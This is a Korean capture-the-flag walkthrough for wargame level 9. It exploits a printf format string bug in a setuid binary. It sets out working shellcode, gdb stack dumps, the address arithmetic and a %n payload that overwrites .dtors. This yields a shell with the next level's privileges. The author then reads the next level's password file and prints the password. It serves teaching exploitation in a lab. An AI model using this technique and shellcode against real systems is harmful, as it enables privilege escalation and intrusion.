Level 9 문제 소스는 아래와 같다.
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv) {
int pad = 0xbabe;
char buf[1024];
strncpy(buf, argv[1], sizeof(buf) - 1);
printf(buf);
return 0;
}
포멧스트링 문제로 보인다. 확인해 보도록 하자.
level9@io:/levels$ ./level09 %x
bfffdec8level9@io:/levels$ ./level09 AAAA%x%x%x%x
AAAAbfffdebe3ffbfffd94041414141level9@io:/levels$
포멧스트링 문제가 맞는 것으로 보인다. 이제 포멧스트링 공격에 필요한 값들을 확인해 보자.
우선 .dtors의 주소!
level9@io:/levels$ objdump -s -j .dtors level09
level09: file format elf32-i386
Contents of section .dtors:
80494d0 ffffffff 00000000 ........
level9@io:/levels$
그리고 쉘코드의 주소!
level9@io:/levels$ export SHELLCODE=`python -c "print '\x90'*100 + '\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80'"`
level9@io:/levels$ gdb -q level09
(gdb) b main
Breakpoint 1 at 0x80483ad
(gdb) r
Starting program: /levels/level09
Breakpoint 1, 0x080483ad in main ()
Current language: auto; currently asm
(gdb) x/32wx $esp
0xbfffd890: 0x0042b298 0x00000000 0x00000000 0xbfffd8b0
0xbfffd8a0: 0x0043f7f5 0x00000008 0x00000088 0x00445ff4
0xbfffd8b0: 0xbfffd8c8 0xbfffd900 0xbfffd91c 0x00000000
0xbfffd8c0: 0x00308000 0x00308b20 0xbfffd8f0 0x0043bbfa
0xbfffd8d0: 0x00000011 0x00000008 0x003086b0 0x00000024
0xbfffd8e0: 0x00000001 0x00000000 0x00000000 0x00000000
0xbfffd8f0: 0x00000000 0x00000000 0x00000208 0x0042b700
0xbfffd900: 0x00000088 0x00000000 0x00000000 0x00000000
(gdb)
0xbfffd910: 0x00b21d54 0x00433792 0x0068e000 0x00003893
0xbfffd920: 0x00445ff4 0xbfffdcd0 0x0042e555 0x004462a0
0xbfffd930: 0x00446820 0x00000000 0x00000000 0x00000000
0xbfffd940: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffd950: 0x00000000 0x00000000 0x004465d4 0x004465c8
0xbfffd960: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffd970: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffd980: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbfffd990: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffd9a0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffd9b0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffd9c0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffd9d0: 0x00000000 0x00000000 0x004462a0 0x00000000
0xbfffd9e0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffd9f0: 0x00443c43 0x00000000 0x00000000 0x00000000
0xbfffda00: 0x00000000 0x00000000 0x00000000 0x00446668
(gdb)
0xbfffda10: 0x00000000 0x00000100 0x003086b0 0x004462ac
0xbfffda20: 0x00446654 0x00000000 0x00010000 0x00000000
0xbfffda30: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffda40: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffda50: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffda60: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffda70: 0x00000000 0x00000003 0x00000000 0x00000000
0xbfffda80: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbfffda90: 0x694c0000 0x0078756e 0x00000000 0x00000000
0xbfffdaa0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffdab0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffdac0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffdad0: 0x69000000 0x6d732e6f 0x74687361 0x74736568
0xbfffdae0: 0x2e6b6361 0x0067726f 0x00000000 0x00000000
0xbfffdaf0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffdb00: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbfffdb10: 0x00000000 0x2e362e32 0x0011c27c 0x0d696910
0xbfffdb20: 0xbfffdb58 0x00433fc8 0x0012218a 0x0804821e
0xbfffdb30: 0x50372e36 0x00446938 0x00b21b18 0xbfff0002
0xbfffdb40: 0x00439748 0x080481e4 0x00446944 0x00445ff4
0xbfffdb50: 0x00b21aec 0x00000001 0xbfffdbd4 0x004343bd
0xbfffdb60: 0x20766f4e 0x30203632 0x33313a37 0x2039313a
0xbfffdb70: 0x0177ff8e 0x00442bdc 0xbfffdba0 0xbfffdba0
0xbfffdb80: 0xf63d4e2e 0x00b21848 0x07b1ea71 0x00000003
(gdb)
0xbfffdb90: 0x00113cbc 0x00113ab8 0x0804821d 0x0804820c
0xbfffdba0: 0x00000000 0x00000000 0x00000001 0x0000085c
0xbfffdbb0: 0x00b21b18 0x00b21848 0x0804820c 0x0011ca8c
0xbfffdbc0: 0x080481a4 0x00000001 0x00445ff4 0xf63d4e2e
0xbfffdbd0: 0x00446820 0xbfffdcc0 0x004345cf 0xbfffdcb0
0xbfffdbe0: 0x080481a4 0xbfffdca4 0x004467c4 0x00000000
0xbfffdbf0: 0x00b21b18 0x00000001 0x00000000 0x00000001
0xbfffdc00: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbfffdc10: 0x00000000 0x00000000 0xbfffdcb0 0xbfffdca4
0xbfffdc20: 0x00000000 0x00000000 0x00000000 0xbfffdcf0
0xbfffdc30: 0x00446668 0x0804820c 0x00000000 0x00000000
0xbfffdc40: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffdc50: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffdc60: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffdc70: 0x00000000 0x00000000 0xbfffde24 0x0017a08e
0xbfffdc80: 0x00249ff4 0x080495a8 0xbfffdc98 0x080482a8
(gdb)
0xbfffdc90: 0x00249ff4 0x080495a8 0xbfffdcb8 0x08048429
0xbfffdca0: 0x00439250 0x08048300 0x0804841b 0x00249ff4
0xbfffdcb0: 0x08048410 0x08048300 0xbfffdd18 0x00126455
0xbfffdcc0: 0x00000001 0xbfffdd44 0xbfffdd4c 0x00b21b18
0xbfffdcd0: 0x00000001 0x00000001 0x00000000 0x0804820c
0xbfffdce0: 0x00249ff4 0x08048410 0x08048300 0xbfffdd18
0xbfffdcf0: 0xebb98081 0x30c835fe 0x00000000 0x00000000
0xbfffdd00: 0x00000000 0x0043e2e0 0x0012637d 0x00445ff4
(gdb)
0xbfffdd10: 0x00000001 0x08048300 0x00000000 0x08048321
0xbfffdd20: 0x080483a4 0x00000001 0xbfffdd44 0x08048410
0xbfffdd30: 0x08048400 0x00439250 0xbfffdd3c 0x00443ae5
0xbfffdd40: 0x00000001 0xbfffde24 0x00000000 0xbfffde34
0xbfffdd50: 0xbfffdec1 0xbfffded1 0xbfffdedc 0xbfffdefe
0xbfffdd60: 0xbfffdf11 0xbfffdf1d 0xbfffdf29 0xbfffdf56
0xbfffdd70: 0xbfffdf6c 0xbfffdf7b 0xbfffdf87 0xbfffdf90
0xbfffdd80: 0xbfffdfa2 0xbfffdfaa 0xbfffdfb9 0x00000000
(gdb)
0xbfffdd90: 0x00000010 0xbfebfbff 0x00000006 0x00001000
0xbfffdda0: 0x00000011 0x00000064 0x00000003 0x08048034
0xbfffddb0: 0x00000004 0x00000020 0x00000005 0x00000007
0xbfffddc0: 0x00000007 0x0042b000 0x00000008 0x00000000
0xbfffddd0: 0x00000009 0x08048300 0x0000000b 0x000003f1
0xbfffdde0: 0x0000000c 0x000003f1 0x0000000d 0x000003f1
0xbfffddf0: 0x0000000e 0x000003f1 0x00000017 0x00000000
0xbfffde00: 0x0000000f 0xbfffde1b 0x00000000 0x00000000
(gdb)
0xbfffde10: 0x00000000 0x00000000 0x69000000 0x00363836
0xbfffde20: 0x00000000 0x76656c2f 0x2f736c65 0x6576656c
0xbfffde30: 0x0039306c 0x4c454853 0x444f434c 0x90903d45
0xbfffde40: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde50: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde60: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde70: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde80: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb)
0xbfffde90: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffdea0: 0x176a9090 0xcddb3158 0x580b6a80 0x2f685299
0xbfffdeb0: 0x6868732f 0x6e69622f 0x5352e389 0x80cde189
0xbfffdec0: 0x45485300 0x2f3d4c4c 0x2f6e6962 0x68736162
0xbfffded0: 0x52455400 0x696c3d4d 0x0078756e 0x5f485353
0xbfffdee0: 0x45494c43 0x323d544e 0x322e3131 0x312e3831
0xbfffdef0: 0x39392e36 0x32353320 0x32203638 0x53530032
0xbfffdf00: 0x54545f48 0x642f3d59 0x702f7665 0x342f7374
(gdb) q
The program is running. Exit anyway? (y or n) y
level9@io:/levels$
이제 필요한 주소를 모두 확인하였다.
.dtors : 0x080494d0
Cleanup : 0x080494d4
SHELLCODE : 0xbfffde80
de80 : 56960
56960 - (8 * 3) - 16 = 56920
1bfff - de80 = 57727
이제 공격을 해보도록 하자.
level9@io:/levels$ ./level09 `python -c "print 'AAAA' + '\xd4\x94\x04\x08' + 'BBBB' + '\xd6\x94\x04\x08' + '%8x'*3 + '%56920c%x' + '%57727c%x'"`
AAAA?BBBB?bfffde12 3ffbfffd890
.
.
.
[생략]
.
.
A80494d4
.
.
[생략]
.
.
.
B80494d6level9@io:/levels$
우리가 원하는 주소로 나온것을 확인할 수 있다. 이제 %x를 %n으로 변경하여 다시 공격해보자.
level9@io:/levels$ ./level09 `python -c "print 'AAAA' + '\xd4\x94\x04\x08' + 'BBBB' + '\xd6\x94\x04\x08' + '%8x'*3 + '%56920c%n' + '%57727c%n'"`
AAAA?BBBB?bfffde12 3ffbfffd890
.
.
.
[생략]
.
.
.
sh-3.2$ id
uid=1009(level9) gid=1009(level9) euid=1010(level10) groups=1009(level9),1029(nosu)
sh-3.2$ cat /home/level10/.pass
uawurxf5
sh-3.2$